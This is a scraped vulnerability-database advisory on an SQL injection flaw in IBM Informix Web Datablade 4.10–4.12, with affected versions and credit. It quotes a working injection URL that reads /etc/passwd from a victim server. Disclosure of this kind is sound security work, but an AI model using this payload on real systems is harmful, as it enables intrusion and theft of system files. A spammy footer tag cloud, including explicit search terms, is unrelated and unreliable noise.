about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , IBM Informix Web Datablade Page Request SQL Injection Vulnerability


Title IBM Informix Web Datablade Page Request SQL Injection Vulnerability
Published 2002-04-11-12:00AM
Updated 2002-05-07-08:39PM
Class Input Validation Error
CVE   CAN-2002-0554
Remote  Yes
Local  No
Credit  Discovered by Simon Lodal <simonl@mirrormind.com>.
Vulnerable  IBM Informix Web Datablade 4.12
IBM Informix SQL 7.31 .UC5
IBM Informix SQL 9.2 0.UC2
IBM Informix Web Datablade 4.11
IBM Informix SQL 7.31 .UC5
IBM Informix SQL 9.2 0.UC2
IBM Informix Web Datablade 4.10
IBM Informix SQL 7.31 .UC5
IBM Informix SQL 9.2 0.UC2
Not Vulnerable  IBM Informix Web Datablade 4.12 UC2
IBM Informix SQL 7.31 .UC5
IBM Informix SQL 9.2 0.UC2
Code   A number of exploits are provided in the advisory released by Simon Lodal <simonl@mirrormind.com>, including the following which will display /etc/passwd:

http://victim.com/site/' UNION ALL SELECT FileToClob('/etc/passwd','server')::html,0 FROM sysusers WHERE username = USER --/.html
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 02:05:29 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
invision g Www.trisha p...25253F INDIAN SEX SEX VEDEOS shylastyle TIAZ xnx.com /search/ex sex clip.c Incest vid WWCOMW.98. www.hanbog Can www.greatw iijihoteli Seximagas indian.sex www.indian bad jojo.c DNS joomla com Www.bollyw News image mybb exolo Sexy Wallp news for c /search/ex CMS is Fre apache 2 /search/ex Anak smp b xboard.us- news for c 200 /compo 200 /compo masscock p www.u8518. Vilas Pati frre sex kossamira com_compro www.idcrx. TxT.8233 Crack+Data news for c msxmsl www.3plc.c arab sex c Gaysex vid